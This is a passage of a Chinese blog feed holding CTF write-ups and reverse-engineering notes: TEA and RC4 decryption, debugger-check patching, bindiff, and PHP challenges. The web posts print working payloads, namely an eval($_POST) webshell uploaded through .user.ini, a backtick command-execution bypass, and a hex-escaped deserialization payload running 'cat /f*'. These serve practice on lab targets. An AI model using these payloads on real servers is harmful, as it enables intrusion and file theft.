class="hljs-number">1</span>]=v1;<br>}<br><br><span class="hljs-keyword">typedef</span> <span class="hljs-keyword">struct</span> {<br> <span class="hljs-type">uint32_t</span> values[<span class="hljs-number">2</span>];<br>} Data;<br><br><span class="hljs-comment">// unsigned char enc[] =</span><br><span class="hljs-comment">// {</span><br><span class="hljs-comment">// 0x65, 0xD2, 0x26, 0x3A, 0xB6, 0xA0, 0xD9, 0x81, 0x2A, 0x00, </span><br><span class="hljs-comment">// 0x5E, 0x0E, 0xE5, 0xEF, 0x07, 0x39, 0x57, 0xBC, 0xB6, 0x71, </span><br><span class="hljs-comment">// 0xA2, 0x0D, 0xAC, 0xE0</span><br><span class="hljs-comment">// };</span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span>{<br> Data v[<span class="hljs-number">3</span>]={{<span class="hljs-number">0x3A26D265</span>,<span class="hljs-number">0x81D9A0B6</span>},{<span class="hljs-number">0x0E5E002A</span>,<span class="hljs-number">0x3907EFE5</span>},{<span class="hljs-number">0x71B6BC57</span>,<span class="hljs-number">0xE0AC0DA2</span>}};<br> <span class="hljs-type">uint32_t</span> k[<span class="hljs-number">4</span>]={<span class="hljs-number">0x0B</span>, <span class="hljs-number">0x16</span>, <span class="hljs-number">0x21</span>, <span class="hljs-number">0x2C</span>};<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">size_t</span> i = <span class="hljs-number">0</span>; i < <span class="hljs-number">3</span>; i++)<br> {<br> <span class="hljs-built_in">decrypt</span>(v[i].values,k);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"decrtp:%x %x\n"</span>,v[i].values[<span class="hljs-number">0</span>],v[i].values[<span class="hljs-number">1</span>]);<br> }<br> <br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure>结果是这个<br>decrtp:4e535343 54467b74<br>decrtp:65615f69 735f736f<br>decrtp:5f656173 7921217d<br>直接就是hex转chr了<br><img src="https://gitee.com/fogpost/photo/raw/master/202410312118868.png" srcset="/img/loading.gif" lazyload><br>NSSCTF{tea_is_so_easy!!}</li></ul><h3 id="MD5爆破"><a href="#MD5爆破" class="headerlink" title="MD5爆破"></a>MD5爆破</h3><p>纯手撸,题解也看不懂,脚本都跑不动</p><h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="怎么多了个没用的php文件"><a href="#怎么多了个没用的php文件" class="headerlink" title="怎么多了个没用的php文件"></a>怎么多了个没用的php文件</h3><p>开头就是一个文件上传页面<br><img src="https://gitee.com/fogpost/photo/raw/master/202411011425977.png" srcset="/img/loading.gif" lazyload><br>我们选择一个文件直接上传,png可以上传,对php有过滤<br><img src="https://gitee.com/fogpost/photo/raw/master/202411011439740.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411011440878.png" srcset="/img/loading.gif" lazyload><br>然后我们尝试抓包并修改数据,可以成功上传,尝试访问<br><img src="https://gitee.com/fogpost/photo/raw/master/202411011442332.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411011442165.png" srcset="/img/loading.gif" lazyload><br>其中也尝试了其他的后缀,不过可以上传但是不可以解析,按照别人的wp来看,好像是uploads目录下有一个notion.php文件<br><img src="https://gitee.com/fogpost/photo/raw/master/202411011454711.png" srcset="/img/loading.gif" lazyload><br>尝试上传.user.ini</p><blockquote><p>.user.ini 是⼀个⽤户⾃定义的php.ini ⽂件,会在其所在的当前⽬录⽣效,优先级⾼于php.ini<br>在user.ini中写⼊以下内容<br>auto_prepend_file = <filename> //包含在⽂件头<br>auto_append_file = <filename> //包含在⽂件尾<br>写⼊其中⼀个即可<br><filename>就写成需要包含的⽂件名,后缀任意上传后,该⽬录下的php⽂件就会⾃动包含<filename><br>.user.ini</p></blockquote><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">auto_prepend_file</span> = 外部文件包含.png<br><span class="hljs-attr">auto_append_file</span> = 外部文件包含.png <br></code></pre></td></tr></table></figure><p>外部文件包含.png</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span> <span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-number">0</span>]);<span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>利用蚁剑成功连接<br><img src="https://gitee.com/fogpost/photo/raw/master/202411011528057.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411011529825.png" srcset="/img/loading.gif" lazyload><br>NSSCTF{11822be1-0c76-4bc8-9f67-82fcf3f3ec33}</p><h3 id="未选择的路"><a href="#未选择的路" class="headerlink" title="未选择的路"></a>未选择的路</h3><p>打开环境</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-comment">//一片森林里分出两条路————而我选择了人迹更少的一条,从此决定了我一生的道路。</span><br><span class="hljs-title function_ invoke__">Include</span>(<span class="hljs-string">'check.php'</span>);<br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><br><span class="hljs-variable">$A</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'easy'</span>];<br><span class="hljs-variable">$B</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'hard'</span>];<br><br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$A</span>)){<br><span class="hljs-keyword">eval</span>(<span class="hljs-string">'e'</span>.<span class="hljs-string">'x'</span>.<span class="hljs-string">'i'</span>.<span class="hljs-string">'t'</span>.<span class="hljs-string">'(); ?>'</span>.<span class="hljs-variable">$A</span>.<span class="hljs-string">'<?php ;'</span>);<span class="hljs-comment">//这条路没有任何过滤诶,是不是好走一些</span><br>}<br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$B</span>)){<br><span class="hljs-title function_ invoke__">check</span>(<span class="hljs-variable">$B</span>);<span class="hljs-comment">//要被正则了,嘤嘤嘤</span><br><span class="hljs-keyword">eval</span>(<span class="hljs-string">"#cmd"</span>.<span class="hljs-variable">$B</span>.<span class="hljs-string">"inject"</span>);<span class="hljs-comment">//这条路怎么还要禁我东西啊,真下头</span><br>}<br></code></pre></td></tr></table></figure><p>先用hard走 hard=system,不过会显示passthru和system被禁用了,使用?>反引号加闭合?hard=?><?php echo `id`;?>(这个不是引号,这个是反引号)<br>这个时候id就是可以执行得命令有点感觉是将前面得过滤,重新插了一个新得php进来执行完成绕过<br>尝试一下easy,好像会直接结束,方式就是在hard过滤</p><h3 id="Maxser-Revenge"><a href="#Maxser-Revenge" class="headerlink" title="Maxser Revenge"></a>Maxser Revenge</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br> <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br> <span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br> <span class="hljs-keyword">include</span>(<span class="hljs-string">'check.php'</span>);<br> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">passthru</span></span>{<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$S</span>;<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$dir</span>;<br> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-variable language_">$this</span>->dir=<span class="hljs-string">'notion'</span>;<br> }<br> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>->S);<br> }<br> }<br> <span class="hljs-variable">$a</span>=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">'NSS'</span>];<br> <span class="hljs-title function_ invoke__">check</span>(<span class="hljs-variable">$a</span>);<br> <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$a</span>);<br></code></pre></td></tr></table></figure><p>一道反序列化题目,我们尝试简单构建pop链,发现存在过滤</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-variable">$a</span>=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">passthru</span>();<br><span class="hljs-variable">$a</span>->S=<span class="hljs-string">"system('ls /')"</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);<br> O:<span class="hljs-number">8</span>:<span class="hljs-string">"passthru"</span>:<span class="hljs-number">2</span>:{s:<span class="hljs-number">1</span>:<span class="hljs-string">"S"</span>;s:<span class="hljs-number">14</span>:<span class="hljs-string">"system('ls /')"</span>;s:<span class="hljs-number">3</span>:<span class="hljs-string">"dir"</span>;N;}<br></code></pre></td></tr></table></figure><p><img src="https://gitee.com/fogpost/photo/raw/master/202411041446655.png" srcset="/img/loading.gif" lazyload><br>利用passthru过滤,转换成16进制来过滤</p><blockquote><p>passthru(“cat /f*”)这个转化成16进制不会产生字母<br>70 61 73 73 74 68 72 75 28 22 63 61 74 20 2F 66 2A 22 29<br>2f和2a换成/和<em>这两个直接用<br>O:8:”passthru”:2:{s:1:”S”;S:20:”\70\61\73\73\74\68\72\75\28\22\63\61\74\20/\66</em>\22\29;”;s:3:”dir”;N;}直接修改,并用大写S来支持字符串得编码</p></blockquote><h3 id="The-future-Revenge"><a href="#The-future-Revenge" class="headerlink" title="The future Revenge"></a>The future Revenge</h3><p>考点CVE-2024-2961<br><a href="https://blog.csdn.net/jennycisp/article/details/140148391">https://blog.csdn.net/jennycisp/article/details/140148391</a><br><a href="https://err0r233.github.io/posts/28510.html">https://err0r233.github.io/posts/28510.html</a> (要梯子)</p><h3 id="签到"><a href="#签到" class="headerlink" title="签到"></a>签到</h3><p>点击后就是这个界面<br><img src="https://gitee.com/fogpost/photo/raw/master/202411071924871.png" srcset="/img/loading.gif" lazyload><br>我们点击sign,最后一个博客地址判断存在ssrf<br><img src="https://gitee.com/fogpost/photo/raw/master/202411071925412.png" srcset="/img/loading.gif" lazyload><br>我们查看源码,index.php、submit.php、save_user.php、show_blog.php,存在这么几个文件<br><img src="https://gitee.com/fogpost/photo/raw/master/202411071927695.png" srcset="/img/loading.gif" lazyload><br>这个好像涉及ssrf了,本人不是很懂,现在先暂停一下,之后补上来</p>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>od脱壳脚本的使用与编写</title>
<link href="/2024/10/29/od%E8%84%B1%E5%A3%B3%E8%84%9A%E6%9C%AC%E7%9A%84%E4%BD%BF%E7%94%A8%E4%B8%8E%E7%BC%96%E5%86%99/"/>
<url>/2024/10/29/od%E8%84%B1%E5%A3%B3%E8%84%9A%E6%9C%AC%E7%9A%84%E4%BD%BF%E7%94%A8%E4%B8%8E%E7%BC%96%E5%86%99/</url>
<content type="html"><![CDATA[<h1 id="od脱壳脚本的使用与编写"><a href="#od脱壳脚本的使用与编写" class="headerlink" title="od脱壳脚本的使用与编写"></a>od脱壳脚本的使用与编写</h1><p>我们的软件取自<a href="https://www.52pojie.cn/thread-422100-1-1.html">52破解</a><br>第一步查壳,并且丢到idapro中看看有什么<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292248198.png" srcset="/img/loading.gif" lazyload><br>可见这个软件是由tElock压缩过的<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292249831.png" srcset="/img/loading.gif" lazyload><br>Idapro也是不负众望的啥也没扫出来,我们od加载一下,这里注意看一下内存加载,基地址是400000,这代表了我们关闭了ALSR这点对我们后面的脱壳很重要<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292251590.png" srcset="/img/loading.gif" lazyload><br>在单步运行到这里时,我们程序会直接跑飞<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292253699.png" srcset="/img/loading.gif" lazyload><br>下断点键入后,逐步步过,发现出现下面这个弹窗,表示本程序是有程序自校验,这里有两个方法,一是找到自校验方式nop掉,二是在每次键入时将断点取消,这也是一个好习惯<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292254330.png" srcset="/img/loading.gif" lazyload><br>看下图发现,此程序还有对调试器的检测,我们这里开启了od的内核插件,但是好像在win10不起作用,没有防止检测,可以选择用win7,来加载<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292303768.png" srcset="/img/loading.gif" lazyload><br>我们重新加载文件,在此处发现对od检测的jmp函数我们将这个函数进行nop即可正常进入软件<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292321969.png" srcset="/img/loading.gif" lazyload><br>如果刚刚没有nop那么我们在下面这个图便会跳转到exitprocess进程结束<br><img src="https://gitee.com/fogpost/photo/raw/master/202410292321971.png" srcset="/img/loading.gif" lazyload></p>]]></content>
<categories>
<category>逆向</category>
</categories>
<tags>
<tag>reverse</tag>
</tags>
</entry>
<entry>
<title>rc4</title>
<link href="/2024/10/28/rc4/"/>
<url>/2024/10/28/rc4/</url>
<content type="html"><![CDATA[<h1 id="RC4"><a href="#RC4" class="headerlink" title="RC4"></a>RC4</h1><p>写题过程中会出现像rc4这种简单的对称加密算法,在此留下对应的解密脚本<br>由于初始化的s盒和产生的密钥流是由固定的密钥确定,并且加密的本质是异或所以为对称的<br>rc4加密主要分为三个部分</p><ul><li>初始化s盒</li><li>生成密钥流</li><li>加密</li></ul><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">KSA</span>(<span class="hljs-params">key</span>):<br> key_length = <span class="hljs-built_in">len</span>(key)<br><br> <span class="hljs-comment"># 初始化S盒</span><br> S = <span class="hljs-built_in">list</span>(<span class="hljs-built_in">range</span>(<span class="hljs-number">256</span>))<br> j = <span class="hljs-number">0</span><br> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">256</span>):<br> j = (j + S[i] + key[i % key_length]) % <span class="hljs-number">256</span><br> S[i], S[j] = S[j], S[i]<br><br> <span class="hljs-keyword">return</span> S<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">PRGA</span>(<span class="hljs-params">S</span>):<br> i = <span class="hljs-number">0</span><br> j = <span class="hljs-number">0</span><br> <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br> i = (i + <span class="hljs-number">1</span>) % <span class="hljs-number">256</span><br> j = (j + S[i]) % <span class="hljs-number">256</span><br> S[i], S[j] = S[j], S[i]<br> K = S[(S[i] + S[j]) % <span class="hljs-number">256</span>]<br> <span class="hljs-keyword">yield</span> K<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">RC4</span>(<span class="hljs-params">key, data</span>):<br> S = KSA(key)<br> keystream = PRGA(S)<br> res = []<br> <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> data:<br> res.append(c ^ <span class="hljs-built_in">next</span>(keystream))<br> <span class="hljs-keyword">return</span> <span class="hljs-built_in">bytes</span>(res)<br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>逆向算法</category>
</categories>
<tags>
<tag>reverse</tag>
</tags>
</entry>
<entry>
<title>hash</title>
<link href="/2024/10/28/hash/"/>
<url>/2024/10/28/hash/</url>
<content type="html"><![CDATA[<h1 id="hash算法"><a href="#hash算法" class="headerlink" title="hash算法"></a>hash算法</h1><p>打算了解一下各个hash算法的细节,防止在看到伪代码时不认识</p><h2 id="MD5"><a href="#MD5" class="headerlink" title="MD5"></a>MD5</h2><h3 id="MD5加密原理步骤"><a href="#MD5加密原理步骤" class="headerlink" title="MD5加密原理步骤"></a>MD5加密原理步骤</h3><ol><li>在MD5算法中,首先需要对信息进行填充,使其位长对512求余的结果等于448,并且填充必须进行(N*512+448)</li><li>初始化变量,以大端字节序来表示,他们分别为: A=0x01234567,B=0x89ABCDEF,C=0xFEDCBA98,D=0x76543210(每一个变量给出的数值是高字节存于内存低地址,低字节存于内存高地址,即大端字节序。在程序中变量A、B、C、D的值分别为0x67452301,0xEFCDAB89,0x98BADCFE,0x10325476)</li><li>处理分组数据<br>以下是每次操作中用到的四个非线性函数(每轮一个)。<br>F( X ,Y ,Z ) = ( X & Y ) | ( (<del>X) & Z )<br>G( X ,Y ,Z ) = ( X & Z ) | ( Y & (</del>Z) )<br>H( X ,Y ,Z ) =X ^ Y ^ Z<br>I( X ,Y ,Z ) =Y ^ ( X | (~Z) )</li></ol><ul><li>MD5 是一种基于迭代和压缩的哈希函数,其核心是对输入数据进行多轮的位运算和逻辑操作。</li><li>常量值:MD5 使用特定的常量(如 0x67452301, 0xEFCDAB89 等)在计算过程中。如果在代码中看到这些特定的常量,特别是在加法操作中,通常指向 MD5 或类似算法。</li><li>处理输入数据的方式:MD5 通常处理输入数据为 512 位(64 字节)块,将每个块分为多个 32 位(4 字节)单元进行处理。</li></ul>]]></content>
<categories>
<category>逆向算法</category>
</categories>
<tags>
<tag>reverse</tag>
</tags>
</entry>
<entry>
<title>bindiff</title>
<link href="/2024/10/28/bindiff/"/>
<url>/2024/10/28/bindiff/</url>
<content type="html"><![CDATA[<h1 id="用bindiff来显示二进制文件的区别"><a href="#用bindiff来显示二进制文件的区别" class="headerlink" title="用bindiff来显示二进制文件的区别"></a>用bindiff来显示二进制文件的区别</h1><p>你是否在面对收到攻击的二进制文件无法比对,看着两个文件而陷入迷茫,不知如何分析,沉沦在函数之海无法自拔,找不到patcher前后的区别,那么bindiff可以帮助你。</p><h3 id="1-自行安装"><a href="#1-自行安装" class="headerlink" title="1. 自行安装"></a>1. 自行安装</h3><h3 id="2-使用"><a href="#2-使用" class="headerlink" title="2.使用"></a>2.使用</h3><p>首先我们打开一个我们所需要分析的软件,在ida完成分析之后我们退出将对应的.ida64包文件保存,然后加载patcher后的文件,在ida中键入crtl+6,使用bindiff插件<br><img src="https://gitee.com/fogpost/photo/raw/master/202410281503232.png" srcset="/img/loading.gif" lazyload><br>选择Diff DAtabase,选择刚刚保存的.ida64文件,出现对应的对比框<br><img src="https://gitee.com/fogpost/photo/raw/master/202410281504805.png" srcset="/img/loading.gif" lazyload><br>在这个绿色框口下我们发现,在最下方的函数extract_dirs_from_files,与原来的文件对比,有仅0.84的相似度,我们便可以知道两个二进制文件在这个函数发生了区别<br><img src="https://gitee.com/fogpost/photo/raw/master/202410281506283.png" srcset="/img/loading.gif" lazyload><br>查看函数,在patcher中发现多了如下一个分支</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs c++">LABEL_7:<br> <span class="hljs-keyword">if</span> ( v9 && !v9[<span class="hljs-number">1</span>] )<br> {<br> *(_QWORD *)&lmao[<span class="hljs-number">8</span>] = <span class="hljs-number">0x3F7D132A2A252822LL</span>;<br> *(_QWORD *)lmao = <span class="hljs-number">0x7D2E370A180F1604LL</span>;<br> *(_QWORD *)&lmao[<span class="hljs-number">24</span>] = <span class="hljs-number">0x31207C7C381320LL</span>;<br> *(_QWORD *)&lmao[<span class="hljs-number">16</span>] = <span class="hljs-number">0x392A7F3F39132D13LL</span>;<br> v18 = lmao;<br> <span class="hljs-keyword">do</span><br> *v18++ ^= **(_BYTE **)v7;<br> <span class="hljs-keyword">while</span> ( &lmao[<span class="hljs-number">31</span>] != v18 );<br> <span class="hljs-built_in">puts</span>(lmao);<br> }<br> <span class="hljs-keyword">goto</span> LABEL_9;<br> }<br> <span class="hljs-keyword">if</span> ( !dirname )<br> <span class="hljs-keyword">goto</span> LABEL_21;<br> component = <span class="hljs-built_in">last_component</span>(*(<span class="hljs-type">const</span> <span class="hljs-type">char</span> **)v7);<br> <span class="hljs-keyword">if</span> ( *component == <span class="hljs-number">46</span> )<br> {<br> v17 = component[(component[<span class="hljs-number">1</span>] == <span class="hljs-number">46</span>) + <span class="hljs-number">1</span>];<br> <span class="hljs-keyword">if</span> ( !v17 || v17 == <span class="hljs-number">47</span> )<br> <span class="hljs-keyword">goto</span> LABEL_7;<br> }<br> <span class="hljs-keyword">if</span> ( *v9 == <span class="hljs-number">47</span> )<br> {<br></code></pre></td></tr></table></figure><p>我们经过cyberchef的函数爆破,来获得最终的数据,注意在数组中存在大小端序的问题<br><img src="https://gitee.com/fogpost/photo/raw/master/202410281511684.png" srcset="/img/loading.gif" lazyload><br><a href="https://www.nssctf.cn/problem/3687">题目来源</a></p>]]></content>
<categories>
<category>逆向</category>
</categories>
<tags>
<tag>tool</tag>
</tags>
</entry>
<entry>
<title>linux换源</title>
<link href="/2024/10/28/linux/"/>
<url>/2024/10/28/linux/</url>
<content type="html"><![CDATA[<p>镜像省的搜</p><blockquote><p>sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup</p></blockquote><blockquote><p>sudo gedit /etc/apt/sources.list</p></blockquote><blockquote></blockquote><p>#deb <a href="http://mirrors.ustc.edu.cn/kali">http://mirrors.ustc.edu.cn/kali</a> kali-rolling main non-free contrib<br>#deb-src <a href="http://mirrors.ustc.edu.cn/kali">http://mirrors.ustc.edu.cn/kali</a> kali-rolling main non-free contrib</p>]]></content>
<categories>
<category>tool</category>
</categories>
<tags>
<tag>linux</tag>
</tags>
</entry>
<entry>
<title>反序列化例题</title>
<link href="/2024/10/27/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"/>
<url>/2024/10/27/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/</url>
<content type="html"><![CDATA[<p>前期我们先以题带学,进行一下熟悉</p><h3 id="例题1-SWPUCTF-2021-新生赛-no-wakeup"><a href="#例题1-SWPUCTF-2021-新生赛-no-wakeup" class="headerlink" title="例题1 [SWPUCTF 2021 新生赛]no_wakeup"></a>例题1 [SWPUCTF 2021 新生赛]no_wakeup</h3><p>直接看到源码</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-title function_ invoke__">header</span>(<span class="hljs-string">"Content-type:text/html;charset=utf-8"</span>);<br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-string">"class.php"</span>);<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">HaHaHa</span></span>{<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$admin</span>;<br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$passwd</span>;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-variable language_">$this</span>->admin =<span class="hljs-string">"user"</span>;<br> <span class="hljs-variable language_">$this</span>->passwd = <span class="hljs-string">"123456"</span>;<br> }<br><br> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-variable language_">$this</span>->passwd = <span class="hljs-title function_ invoke__">sha1</span>(<span class="hljs-variable">$this</span>->passwd);<br> }<br><br> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>{<br> <span class="hljs-keyword">if</span>(<span class="hljs-variable language_">$this</span>->admin === <span class="hljs-string">"admin"</span> && <span class="hljs-variable language_">$this</span>->passwd === <span class="hljs-string">"wllm"</span>){<br> <span class="hljs-keyword">include</span>(<span class="hljs-string">"flag.php"</span>);<br> <span class="hljs-keyword">echo</span> <span class="hljs-variable">$flag</span>;<br> }<span class="hljs-keyword">else</span>{<br> <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>->passwd;<br> <span class="hljs-keyword">echo</span> <span class="hljs-string">"No wake up"</span>;<br> }<br> }<br> }<br><span class="hljs-variable">$Letmeseesee</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">'p'</span>];<br><span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$Letmeseesee</span>);<br><span class="hljs-meta">?></span><br></code></pre></td></tr></table></figure><p>经过wp发现,在调用反序列化时,会自动执行_wakeip()导致passwd被sha1加密,并且不可逆,所以我们要考虑_wakeip()的让绕过</p><ul><li>知识点:php特性,当反序列化字符串中,表示对象属性个数的值大于真实属性个数时,会跳过__wakeup()函数的执行。</li></ul><pre><code class="php">$aa = new HaHaHa();$aa->admin = "admin";$aa->passwd = "wllm";$stus = serialize($aa);print_r($stus);</code></pre><p>O:6:”HaHaHa”:2:{s:5:”admin”;s:5:”admin”;s:6:”passwd”;s:4:”wllm”;}<br>序列化之后我们可以改变参数数量,上传即可<br>O:6:”HaHaHa”:3:{s:5:”admin”;s:5:”admin”;s:6:”passwd”;s:4:”wllm”;}</p>]]></content>
<categories>
<category>网络</category>
</categories>
<tags>
<tag>php</tag>
</tags>
</entry>
<entry>
<title>solidity</title>
<link href="/2024/10/25/solidity/"/>
<url>/2024/10/25/solidity/</url>
<content type="html"><![CDATA[<h1 id="Solidity代码块"><a href="#Solidity代码块" class="headerlink" title="Solidity代码块"></a>Solidity代码块</h1><p>真不想写这个啊,没见过的代码,直接搜的到时候背就行,一下代码都是Solidity代码块,为了便于查看用的是c++格式解析,因为sd根本就没有自带解析,也懒得找了</p><h2 id="完成加减运算"><a href="#完成加减运算" class="headerlink" title="完成加减运算"></a>完成加减运算</h2><p>int / uint :分别表示有符号和无符号的不同位数的整型变量。 支持关键字 uint8 到 uint256 (无符号,从 8 位到 256 位)以及 int8 到 int256,以 8 位为步长递增。 uint 和 int 分别是 uint256 和 int256 的别名</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs c++">pragma solidity >=<span class="hljs-number">0.4</span><span class="hljs-number">.21</span> <=<span class="hljs-number">0.8</span><span class="hljs-number">.0</span><br><br>contract MatchTest{<br> function <span class="hljs-built_in">add</span>(uint i,uint j) pure <span class="hljs-keyword">public</span> <span class="hljs-built_in">returns</span>(uint){<br> <span class="hljs-keyword">return</span> i + j;<br> }<br> <span class="hljs-function">function <span class="hljs-title">sub</span><span class="hljs-params">(uint i,uint j)</span> pure <span class="hljs-keyword">public</span> <span class="hljs-title">returns</span><span 